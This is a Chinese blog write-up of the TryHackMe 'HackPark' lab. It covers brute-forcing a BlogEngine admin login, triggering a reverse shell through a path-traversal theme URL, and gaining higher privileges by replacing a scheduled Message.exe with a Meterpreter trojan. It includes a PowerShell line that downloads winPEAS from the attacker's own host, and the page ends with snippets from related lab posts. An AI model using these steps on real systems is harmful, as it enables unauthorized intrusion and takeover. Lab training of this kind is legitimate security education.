THM-HackPark-密码爆破--rce-WinPEAS提权

已于 2024-01-20 19:30:43 修改
阅读量422 收藏 7
点赞数 11
分类专栏: windows靶机 THM靶机 文章标签: 安全 web安全
于 2024-01-01 19:04:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangmahaonan/article/details/135319764
版权

1.端口扫描

2.web渗透

寻找一番,发现只有个登录页面有点用

猜测用户名是admin,密码用bp爆破一下

得到密码是1qaz2wsx,登陆进去是一个后台页面

得到blogengine服务版本是3.3.6

搜索相关漏洞:https://www.exploit-db.com/exploits/46353

具体漏洞利用要点击页面的NEW添加木马

注意这里的木马文件要改成PostView.asc

http://10.10.245.157/?theme=../../App_Data/files

最后再访问这个url即可接收到反弹shell

3.权限提升

根据room的提示,我们下载一个脚本工具:https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe

本地开启http服务,将winPEAS上传到shell

cd C:\Windows\Temp    该目录全局可写‘

powershell -c wget "http://10.2.93.221:8000/Desktop/winPEASx64.exe" -outfile "winPEASx64.exe"

dir

winPEASx64.exe

写入脚本后运行,找到service information

可以看到异常服务的文件路径:C:\Program Files (x86)\SystemScheduler

进入该路径

查看Events日志文件,目录下有一个文件:20198415519.INI_LOG.txt

查看该日志文件

可以看到系统隔半分钟执行一次Message.exe,这样我们可以再上传一个反弹shell木马替换掉该文件就能让系统执行我们的木马,普通shell的权限不能使用mv命令,我们利用msf升级为meterpreter shell

有了足够的权限,我们先覆盖掉原来的Message.exe,再上传假的Message.exe木马(注意这里需要再开一个msf接收root shell)

yang_boxmaster
关注
  • 11
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
向日葵RCE后续利用之本地
weixin_45794666的博客
02-27 1200
根据玄武实验室的文章 https://github.com/Ryze-T/CNVD-2022-10270-LPE 找到目标日志文件 cd /d c:/ dir /S sunlogin_service* 向日葵日志文件 sunlogin_service.20220226-171345.log 复现 安装.NET 4 https://www.microsoft.com/zh-cn/download/details.aspx?id=17718 在运行,发现需要指定路径路径,而我在win7下目录为 C:
TRY HACK ME | Hack Park 「Hydra+Winpeas」
AKAHRZ的博客
04-23 3680
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellTA.
HackTheBox-Starting Point--Tier 2---Archetype
七天
11-16 247
2 将 nc64.exe 上传至 C:\Users\sql_svc\Downloads 目录,从http web服务器输出可以看出,nc64.exe 上传成功。激活了 xp_cmdshell,使用xp_cmdshell 执行命令,whoami执行成功,如果可以执行命令的话我们就可以执行反向shell。查看backups,并发现 prod.dtsConfig 文件,在 prod.dtsConfig 中发现了。通过nc将cmd.exe绑定到监听器,执行命令,获取到shell。尝试激活 xp_cmdshell。
TRY HACK ME | Steel Mountain「利用powershell
AKAHRZ的博客
04-09 4440
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Hack the box-Archetype
Ka_li12的博客
09-04 103
靶机地址: 10.129.67.115输入nmap -sC -sV 10.129.67.115进行端口扫描,获得4个开放端口445端口使用SMB协议, 主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。答案: 14331433为SQL Server默认的端口答案: backups输入: smbclient -N -L 10.129.67.115末尾没有$的文件名不需要管理员限通过smbclient访问backups文件, 并dir查看当前目录下的文件当前目录下只有一个prod.dt
thm-discord-bot:TryHackMe Python Bot
01-28
不和谐机器人 TryHackMe Python不和谐机器人来源:由DarkStar7471 aka Jon创建 描述: 为在TryHackMe不和谐聊天服务器上使用而创建的机器人。 相关托管链接 ... 贡献者 黑暗之星7471 初始交和创建,初始嵌齿轮和...
p-hp:我的GitHub个人资料的配置文件
03-19
分析数字安全性(数字版管理+软件完整...连接方式:语言和工具: 2021年目标:为开源项目做出更多贡献进一步沉迷于ATS和HTML在Bug赏金+ HTB / THM相关网站上更好地建立代表完成2K21隐私入侵/高稳定性(Dcord API)
arsnova-mobile:ARSnova是THM开发的基于网络的新型受众响应系统
02-04
ARSnova ARSnova是一种基于Web的现代受众响应系统(ARS)方法。 它是的基础,并根据开放源代码许可证发布。 ARSnova 2 ARSnova 2包含两个项目:Web客户端(“ ARSnova Mobile”)和后端。 该存储库包含Web客户端...
thm-scripts:TryHackMe-Python脚本
04-19
THM-脚本 Python脚本可获取某些TryHackMe房间的标志。 要求 所有脚本均在Python v3.6上进行了测试。 用法 python3.6 script_name.py 执照
tryhackme-writeups:TryHackMe的文章
02-11
免责声明撰写内容应具有指向TryHackMe的链接,并且不应包含任何密码/破解的哈希/标志按字母顺序对房间排序有关参考链接,请使用您的pseudo-roomURLname (例如, : noraj-learnowaspzap )意见书如果要合并自己的...
Hack The Box Starting Point 渗透测试入门靶场 TIER 2 - Archetype
Start C的博客
05-18 880
先对SPAWN的机器扫描一下,nmap -sC -sV IP 扫描出了135,139,445,1433端口及具体信息。 TASK 1,数据库服务在哪个TCP端口?根据nmap的扫描结果,Microsoft SQL Server 2017服务运行在1433端口。 TASK 2,SMB上可用的非管理共享的名称是什么? 我们使用smbclient查看一下目标主机上可用的共享 smbclient -N -L IP (-N:不需要密码,-L:获取主机上可用的共享列表) 这里我们发现除了ADMIN$、C$和I.
一次绕过防火墙获取RCE以及到root限的渗透过程
weixin_30667301的博客
05-03 543
本文是关于Apache struts2 CVE-2013-2251是由于导致执行远程命令的影响而被高度利用的漏洞。简而言之,通过操纵以“action:”/”redirect:”/”redirectAction:”为前缀的参数引入的漏洞,允许在使用<Struts 2.3.15作为框架的Java Web应用程序中执行远程命令。 现在,当这个漏洞以病毒式疯狂传播时,主要的应用防火墙...
[Hack The Box]靶机8 Optimum
Huamang的博客
04-01 426
nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看 打开是HFS,nmap扫出来是HFS2.3 这个版本的HFS是有cve的 https://nvd.nist.gov/vuln/detail/CVE-2014-6287 msf有这个模块 直接拿下shell 拿到user.txt 进不了admin,需要 本地起一个python服务,把winpeas传上去 powershell -c "(new-object System.Net.WebClient).Dow.
网络安全之渗透实战学习
热门推荐
kali_Ma的博客
10-27 2万+
前言 本次渗透以SMB共享之SCF文件攻击为突破点,利用burp编码爆破Basic Authorization认证、smb连接的多种方法、windows用户的NTLM值破解方法、evil-winrm的运用、windows主机信息收集工具、msf运行powershell脚本、远程运行powershell脚本、PrintNightmare漏洞等多个知识点。 本次渗透过程从技术层面来说难度并不算很大,本文精华在于渗透过程中运用到了多个知识点,并对多种利用SMB攻击的方法作了总结,下面开始此次渗透实战之旅。 信
Offensive Meathead 靶机渗透
Shadow的博客
03-23 173
offensive 靶机渗透
全平台系统辅助工具 PEASS-ng
LuckySec
04-27 6351
0x01 PEASS-ng 介绍 PEAS-ng 是一款适用于 Windows 和 Linux/Unix* 和 MacOS 的升工具。 项目地址:https://github.com/carlospolop/PEASS-ng PEAS-ng 工具搜索可能的本地升路径,可以利用这些路径并将它们以漂亮的颜色打印输出,可以方便轻松识别错误配置。 检查来自book.hacktricks.xyz的本地 Windows 升清单 WinPEAS - Windows 本地脚本(C#.exe
CobaltStrike系列学习笔记——(二)
limb0的博客
12-07 5327
CobaltStrike系列学习笔记——(二) 实验环境 系统 IP地址 服务器 kali 192.168.134.130 靶机 win7 192.168.134.135 先来回顾上一节的内容 进入目录: root@kali:~# cd cobaltstrike3.14/ 启动服务器: root@kali:~/cobaltstrike3.14# ./teamserv...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1143
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
医疗健康信息的安全挑战与隐私保护最佳实践
最新发布
2301_79955948的博客
07-12 1277
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
THM3060 应用笔记Type A 应用说明
11-29
"THM3060 应用笔记Type A 应用说明" 这篇文档是关于THM3060集成电路在处理ISO/IEC14443 Type A卡片应用时的详细指南,主要涵盖了该芯片如何支持ISO/IEC14443协议的A类标准以及相关的配置和操作流程。THM3060是一款...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值